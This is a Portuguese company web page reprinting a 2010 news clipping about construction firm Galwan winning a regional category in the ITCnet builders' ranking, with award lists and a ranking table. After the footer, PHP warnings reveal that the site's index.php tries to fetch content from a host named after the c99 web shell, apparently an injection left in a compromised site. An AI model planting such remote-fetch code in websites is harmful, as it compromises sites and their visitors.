Home > A Galwan

A Galwan

CLIPPING

Clipping

Tamanho do texto A+| A-

Galwan recebe prêmio nacional - ITCnet 05/04/2010

 

    Há mais de 30 anos no mercado brasileiro, pesquisando e divulgando informações de todas as obras no País, a ITCnet recebeu convidados especiais na noite de 9 de março, em São Paulo. O Centro de Eventos Milenium foi palco do 6º Ranking das 100 Maiores Construtoras de 2009.

    O presidente da ITC, Sr. Guillermo Guirao Vidal, abriu o evento comemorando o desempenho deste mercado. Segundo ele, é inegável o crescimento obtido pelas construtoras brasileiras nos últimos anos, e em 2009 não foi diferente, mesmo diante da cautela que se instalou diante da crise. “Contabilizamos no ano passado cerca de 328 bilhões de dólares em obras realizadas no Brasil, o equivalente a 91 milhões de metros quadrados construídos.

E esse é o nosso intuito: mostrar quais são essas companhias, conferindo a elas uma homenagem mais que merecida. “Para o próximo Prêmio, nosso desejo é incluir uma categoria especialmente para obras viárias, saneamento, etc., pelo seu número e importância neste mercado”.

Para falar sobre “as expectativas com relação ao mercado imobiliário brasileiro e o papel importante das construtoras para o desenvolvimento do setor”, o evento contou com a presença do Dr. Celso Luiz Petrucci, diretor-executivo e economista-chefe do Secovi – Sindicato da Habitação de São Paulo. “Primeiramente é muito importante nos fazer presentes em premiações deste tipo, porque além de darem às empresas construtoras e  incorporadoras o seu devido valor, fomentam o mercado imobiliário, que tem se mostrado bastante positivo. 

A cidade de São Paulo, que representa uma parcela significativa do país, tem uma expectativa de crescimento em termos de lançamentos imobiliários em cerca de 10% em 2010. “Teremos provavelmente 25 mil novas unidades”, adianta o executivo, que na seqüência premiou a Even Construtora e Incorporadora – primeiro lugar na categoria Residencial São Paulo.

AS HOMENAGEADAS
 

Esta é uma das 11 categorias existentes no Ranking ITCnet. Confira a seguir as demais,cujas companhias homenageadas subiram ao palco nesta noite de festa:

Residencial Rio de Janeiro
– Cyrela Brazil Realty
Residencial Sul
– Criciúma Construções
Residencial Minas Gerais
– MRV Serviços de Engenharia
Residencial Espírito Santo
– Galwan Construtora e Incorporadora
Residencial Centro-Oeste
– Construtora Borges Landeiro
Residencial Norte/Nordeste
– Capuche Empreendimentos Imobiliários
Comercial
– Brookfield Incorporações
– Racional Engenharia
Industrial
– WTorre Engenharia e Construção
– Serpal Engenharia e Construtora 

O Prêmio Especial, conferido à Construtora Recordista, ou seja, àquela que teve a maiorquantidade de metros quadrados construídos em 2009, foi para a Gafisa. Para Luiz FernandoBueno, diretor de Operações da companhia, foi uma alegria conquistar, pelo segundo ano consecutivo, o primeiro lugar no ranking. “Este prêmio é para a Gafisa, mas principalmentepara as pessoas que fazem a companhia, o nosso maior patrimônio”, destacou ele. 

CONSTRUÇÃO RESPONSÁVEL

A novidade ficou por conta do lançamento do estudo Sustentabilidade - Ações ambientais, que tem foco nas empresas que mais metros quadrados estão construindo dentro dos princípios e práticas da preservação do Meio Ambiente. 

Nesta categoria, foram duas as empresas homenageadas: MPD Engenharia e Dan-Herbert Construtora e Incorporadora.  

Aliás, o tema “Sustentabilidade” ganhou destaque especial no evento. Os presentes tiveram a oportunidade de ouvir o diretor-executivo do Green Building Council Brasil, Nelson Kawakami. Segundo ele, seremos até 2025 cerca de 9 bilhões de pessoas no planeta.  

Ou seja, precisamos pensar na nossa responsabilidade enquanto consumidores de recursos naturais, e também a construção civil, atividade responsável por 21% da água consumida no mundo e pelos 65% dos resíduos gerados. “Nosso papel enquanto entidade (e cidadão) é incentivar a construção sustentável e ética, que também tem se mostrado como uma estratégia de diferenciação. Já são 650 milhões de metros quadrados construídos no mundo certificados pelo LEED, sendo que o Brasil está em quinto lugar, com 14 empreendimentos”, informa Kawakami.

Classificação

ConstrutoraTotal m²n° obras
1Gafisa/Fit/Tenda5.859.271,71459
2Cyrela / Goldsztein / Andrade Mendonça / RJZCyrela3.315.466,7173
3Even2.483.888,9770
4Brookfield2.461.608,1450
5MRV2.384.488,23184
26Galwan589.800,2724

Fonte: 6° Ranking 2009 – ITCnet
Compartihe:

Central de Vendas

Central Vendas(27) 3200 4004
Fale com o Corretor

SIGA-NOS NO FACEBOOK
Endereço: Rua Antônio Ataíde, 823 10° andar - Ed. Tropical Shopping - Vila Velha - ES - CEP: 29.100-290
Copyright © 2017 - todos os direitos reservados - Vendas: 27 3200-4004 / 27 3062-4020 Escritório: 27 3320-7600

Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/galwan/public_html/index.php on line 71

Warning: file_get_contents(http://www.c99shell.gen.tr/2.html) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/galwan/public_html/index.php on line 71